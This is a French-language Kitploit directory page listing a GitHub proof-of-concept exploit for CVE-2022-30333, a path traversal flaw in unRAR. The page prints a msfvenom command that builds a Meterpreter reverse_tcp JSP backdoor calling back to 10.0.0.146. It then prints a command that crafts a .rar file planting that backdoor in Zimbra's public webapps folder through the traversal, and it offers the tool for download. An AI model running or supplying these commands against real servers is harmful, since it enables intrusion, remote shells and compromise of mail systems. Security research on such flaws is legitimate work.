Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-30333 — Preuve de concept d'exploitation pour la traversée de chemin CVE-2022-30333 dans unRAR, générant des fichiers .rar malveillants pour extraire des charges utiles arbitraires vers des emplacements spécifiés par l'attaquant. | Kitploit
Outils/GitHubGitHub/rakhithjk/cve-2022-30333
Frameworks d'ExploitationGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubrakhithjk/cve-2022-30333

CVE-2022-30333

Preuve de concept d'exploitation pour la traversée de chemin CVE-2022-30333 dans unRAR, générant des fichiers .rar malveillants pour extraire des charges utiles arbitraires vers des emplacements spécifiés par l'attaquant.

Voir le dépôt
1il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Une preuve de concept pour CVE-2022-30333 - une vulnérabilité de traversée de chemin dans unRAR versions antérieures à 6.11. Je l'ai créée comme démonstration de l'exploit pour un article AttackerKB, et j'espère l'intégrer bientôt dans un module Metasploit !

En gros, vous fournissez une cible (incluant la traversée de chemin) et des données de fichier, et cet outil générera un fichier .rar qui extraira ce fichier vers cet emplacement. La longueur maximale du fichier est de 104 octets, et la longueur maximale du fichier est de 4096 octets. (Ce n'est pas intrinsèque à la vulnérabilité, c'est juste ce que j'ai choisi lors de la génération du fichier).

Par exemple, générez une porte dérobée avec msfvenom :

root@kitploit:~
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

Ensuite, créez un fichier .rar, en plaçant le .jsp à un endroit amusant :

root@kitploit:~
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
Télécharger l’outil